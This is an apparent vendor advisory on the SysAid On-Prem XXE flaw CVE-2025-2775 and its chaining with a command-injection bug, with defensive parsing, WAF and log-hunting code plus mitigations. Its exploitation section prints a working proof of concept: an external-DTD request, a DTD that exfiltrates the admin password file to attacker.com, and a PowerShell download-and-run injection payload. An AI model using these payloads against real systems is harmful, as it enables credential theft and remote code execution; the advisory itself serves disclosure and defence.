
Exploited! SysAid On-Prem XML External Entity Vulnerability (CVE-2025-2775)

Amit Sheps, Director of Product Marketing
May 8, 2025

SysAid has patched a critical XML External Entity (XXE) flaw that lets unauthenticated attackers turn a routine /mdm check-in request into full administrator compromise—and, when chained with a newly disclosed command-injection bug, into remote code execution (RCE). The vulnerability, tracked as CVE-2025-2775, affects all SysAid On-Prem deployments up to 23.3.40 and is now fixed in 24.4.60.

What is CVE-2025-2775 SysAid On-Prem XML External Entity Vulnerability?

CVE-2025-2775 is an unauthenticated XXE issue in the /mdm/checkin, /mdm/serverurl, and /lshw endpoints of SysAid On-Prem. The application parses attacker-supplied XML with an unsafe call to PropertyListParser.parse() (and related XMLBeans routines) without disabling external entity resolution. By embedding an external <!DOCTYPE> directive, an attacker can:

  • Force the SysAid server to fetch remote resources (blind SSRF).
  • Read arbitrary files on the host OS.
  • Exfiltrate credentials contained in the installation script InitAccount.cmd, which stores the administrator user name and plaintext password.
  • Chain those credentials with a post-auth OS-command injection bug (CVE-2025-2778) in the API_jsp component to execute commands as SYSTEM.

The flaw is rated CVSS 9.3 (Critical) and maps to CWE-611: Improper Restriction of XML External Entity Reference.
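The precondition for the whole chain is an XML parser that still honours DOCTYPE and entity declarations. As an added illustration (not code from the original post, from SysAid, or from IONIX), the following Python shows the defender-side control that removes that precondition, and it also serves mitigation steps 2 and 3 below: refuse any body destined for the unauthenticated XML endpoints if it carries a DOCTYPE or entity declaration, before any parser sees it. The endpoint list comes from this advisory; the sample bodies, the `dtd-host.invalid` host, and the function names are constructed for the example.

```python
"""Defender-side XML intake guard modelled on the CVE-2025-2775 pattern.

Constructed example: the request bodies and helper names below are
invented for illustration; only the endpoint paths come from the advisory.
"""
import re
import xml.etree.ElementTree as ET

# Endpoints the advisory names as reachable without authentication.
UNAUTH_XML_PATHS = ("/mdm/checkin", "/mdm/serverurl", "/lshw")

# A plist check-in never legitimately needs a DOCTYPE or an entity
# declaration, so any such marker is grounds for rejection.
_DTD_MARKERS = re.compile(rb"<!\s*(DOCTYPE|ENTITY)", re.IGNORECASE)

# Constructed sample bodies (no real device data).
BENIGN_CHECKIN = (b'<?xml version="1.0"?><plist version="1.0"><dict>'
                  b'<key>UDID</key><string>TEST-UDID-0001</string></dict></plist>')
DTD_CHECKIN = (b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % d SYSTEM '
               b'"http://dtd-host.invalid/x.dtd">%d;]><plist>&send;</plist>')


class UnsafeXml(ValueError):
    """Raised when a body contains a DTD construct we never want parsed."""


def is_dtd_bearing(body: bytes) -> bool:
    """True if the body declares a DOCTYPE or any entity.

    The NUL-stripped view is scanned as well, so a body re-encoded as
    UTF-16 cannot hide the markers from a byte-level match.
    """
    for view in (body, body.replace(b"\x00", b"")):
        if _DTD_MARKERS.search(view):
            return True
    return False


def reject_dtd(body: bytes) -> None:
    """Raise UnsafeXml if the body carries a DOCTYPE or entity declaration."""
    if is_dtd_bearing(body):
        raise UnsafeXml("DOCTYPE/ENTITY declarations are not accepted")


def parse_checkin(body: bytes) -> dict:
    """Parse a plist check-in into {key: value}, but only after the guard.

    xml.etree is used here for illustration; the point is that the guard
    runs before the bytes reach whatever parser the application uses.
    """
    reject_dtd(body)
    root = ET.fromstring(body)
    d = root.find("dict")
    if d is None:
        return {}
    kids = list(d)
    # plist dicts alternate <key> and value elements.
    return {kids[i].text: kids[i + 1].text for i in range(0, len(kids) - 1, 2)}


def waf_decision(path: str, body: bytes) -> str:
    """Edge rule for a reverse proxy or WAF: 'block' or 'allow'.

    Only the unauthenticated XML endpoints are policed here; everything
    else is left to the application's own authentication and parsing.
    """
    if path.startswith(UNAUTH_XML_PATHS):
        try:
            reject_dtd(body)
        except UnsafeXml:
            return "block"
    return "allow"


if __name__ == "__main__":
    print(parse_checkin(BENIGN_CHECKIN))
    print(waf_decision("/mdm/checkin", DTD_CHECKIN))
```

The same rule expressed inside a Java application is to set the `http://apache.org/xml/features/disallow-doctype-decl` feature to `true` on the `DocumentBuilderFactory` (or the equivalent option of whichever parser library is in use) rather than merely disabling external general entities; rejecting the DOCTYPE outright also closes the parameter-entity route the exploit above relies on.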

Affected versions

  • Vulnerable: SysAid On-Prem 23.3.40 and earlier
  • Patched: SysAid On-Prem 24.4.60 (released March 3 2025)

Exploiting the Vulnerability

1. Triggering XXE

A minimal proof-of-concept sends a malicious plist to /mdm/checkin:

POST /mdm/checkin HTTP/1.1
Host: victim.example.com
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE x [
 <!ENTITY % d SYSTEM "http://attacker.com/evil.dtd">
 %d;
]>
<plist>&send;</plist>

evil.dtd might embed:

<!ENTITY % file SYSTEM "file:///C:/Program Files/SysAidServer/logs/InitAccount.cmd">
<!ENTITY % send "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?d=%file;'>">
%send;

The server silently requests InitAccount.cmd, leaking the admin password to the attacker.

2. From Admin Password to RCE

With the harvested admin credentials, the attacker logs in and abuses the javaLocation parameter of the updateApiSettings form. Because that value is later concatenated into a shell script without sanitisation, a payload such as:

; powershell -c "Invoke-WebRequest http://attacker.com/shell.ps1 -OutFile C:\windows\temp\s.ps1; C:\windows\temp\s.ps1" ;

yields command execution as the SysAid Windows service account (SYSTEM by default).

Potential Risks

  • Full ITSM takeover – Attackers gain SysAid admin access, allowing ticket tampering, data theft, and impersonation of service-desk staff.
  • Remote code execution – Chaining with CVE-2025-2778 lets attackers run arbitrary OS commands, install backdoors, deploy ransomware, or pivot into the internal network.
  • Credential harvesting – The plaintext admin password, often re-used elsewhere, becomes an instant lateral-movement accelerator.
  • Compliance impact – Exposure of ticket data (often containing PII and infrastructure details) can trigger GDPR, HIPAA, or PCI violations.

Mitigation Steps

  1. Upgrade immediately – Install SysAid On-Prem 24.4.60 or later.
  2. Remove internet exposure – Until patched, restrict access to /mdm/, /lshw, and API.jsp via reverse proxy or WAF.
  3. Harden XML parsing – Disable external entity resolution in any custom XML parsers.
  4. Rotate credentials – Delete InitAccount.cmd, reset the SysAid admin password, and review stored secrets.
  5. Monitor for IOCs – Look for outbound DTD requests, suspicious cmd.exe children of Tomcat, or rogue .ps1 files.
  6. Validate continuously – Use the IONIX Exposure Management Platform to confirm the patched version is running and no pre-auth XXE endpoints remain externally reachable.
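Step 5 names two host-side indicators that can be hunted in process-creation telemetry: a shell spawned by the Tomcat service, and a script run from a temp directory. The following Python is an added example (not IONIX's or SysAid's detection content) that applies those checks to a handful of constructed process events; the field names follow the Sysmon Event ID 1 / Windows 4688 vocabulary (Image, ParentImage, CommandLine), and the paths, process names and command lines are invented for illustration.

```python
"""Hunt process-creation events for the post-exploitation IOCs listed above.

Constructed example: the events, paths and binary names are invented; the
install directory mirrors the one quoted in the advisory, nothing more.
"""
from dataclasses import dataclass
from typing import List, Tuple
import ntpath


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # ParentImage
    image: str          # Image
    command_line: str   # CommandLine


# Tomcat on Windows runs under a tomcat<N>.exe wrapper or java.exe; either
# spawning a shell is unexpected for SysAid and matches the injection path.
SERVER_PARENT_PREFIXES = ("tomcat", "java")
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOAD_CRADLES = ("invoke-webrequest", "downloadstring", "downloadfile", "curl ")


def _base(path: str) -> str:
    # ntpath handles Windows separators regardless of the host OS.
    return ntpath.basename(path).lower()


def is_server_parent(parent_image: str) -> bool:
    return _base(parent_image).startswith(SERVER_PARENT_PREFIXES)


def flag(ev: ProcEvent) -> List[str]:
    """Return the list of indicators matched by one event (empty if none)."""
    reasons = []
    if is_server_parent(ev.parent_image) and _base(ev.image) in SHELLS:
        reasons.append("shell spawned by Tomcat/Java")
    cl = ev.command_line.lower()
    if ".ps1" in cl and "\\windows\\temp\\" in cl:
        reasons.append("script executed from a temp directory")
    if any(c in cl for c in DOWNLOAD_CRADLES):
        reasons.append("download cradle in command line")
    return reasons


def hunt(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Return (index, reasons) for every event that matched at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        reasons = flag(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample telemetry: service start, a bare shell child, a
# shell child carrying a download cradle, and an unrelated user session.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\services.exe",
              r"C:\Program Files\SysAidServer\tomcat\bin\tomcat9.exe",
              "tomcat9.exe //RS//SysAid"),
    ProcEvent(r"C:\Program Files\SysAidServer\tomcat\bin\tomcat9.exe",
              r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c echo maintenance"),
    ProcEvent(r"C:\Program Files\SysAidServer\tomcat\bin\tomcat9.exe",
              r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c powershell -c "Invoke-WebRequest http://example.invalid/x.ps1 '
              '-OutFile C:\\windows\\temp\\s.ps1; C:\\windows\\temp\\s.ps1"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c Get-Process"),
]


if __name__ == "__main__":
    for idx, why in hunt(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].command_line, why)
```

A bare `cmd.exe` child of Tomcat is reported on its own because the page treats it as suspicious in this environment; the number of reasons on a hit gives a crude severity for triage. The third indicator in step 5, outbound DTD fetches, lives in proxy or DNS logs rather than process events and needs a separate query.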

Am I Impacted by CVE-2025-2775?

IONIX is actively tracking this vulnerability. Our security research team has developed a full exploit simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the Threat Center of the IONIX portal.


References

  • NVD entry for CVE-2025-2775
  • SysAid 24.4.60 release notes (security fixes)
  • WatchTowr technical write-up and PoC
  • Arctic Wolf analysis bulletin
